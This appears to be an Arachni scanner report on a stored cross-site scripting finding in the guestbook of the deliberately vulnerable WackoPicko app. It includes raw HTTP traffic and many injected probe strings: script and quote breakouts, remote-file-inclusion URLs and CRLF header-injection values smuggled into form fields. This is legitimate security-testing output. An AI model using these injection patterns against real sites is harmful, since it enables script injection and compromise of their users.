        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name"><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit">
</form>


</div>
       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
comment
name
comment
1
name
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.607856 load page
URL http://192.168.0.26/WackoPicko/guestbook.php
1 0.095067 request http://192.168.0.26/WackoPicko/guestbook.php
2 0.122892 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 90
Content-Type: application/x-www-form-urlencoded

comment=1&name=window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink%28%29
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1606
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
